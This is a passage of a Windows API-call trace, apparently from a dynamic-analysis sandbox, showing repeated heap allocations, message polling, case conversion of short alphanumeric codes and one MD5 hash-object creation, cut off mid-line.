[0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.620] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.620] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.620] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.621] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.621] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.621] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0251.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.622] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.623] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.623] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.623] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.623] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.624] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.624] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.624] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.624] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.624] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.625] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.625] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.625] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.625] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.626] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.626] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.626] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.627] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.627] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.627] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.627] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.628] CryptCreateHash (in: hProv=0xad2c70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.630] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.631] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.631] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.631] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") 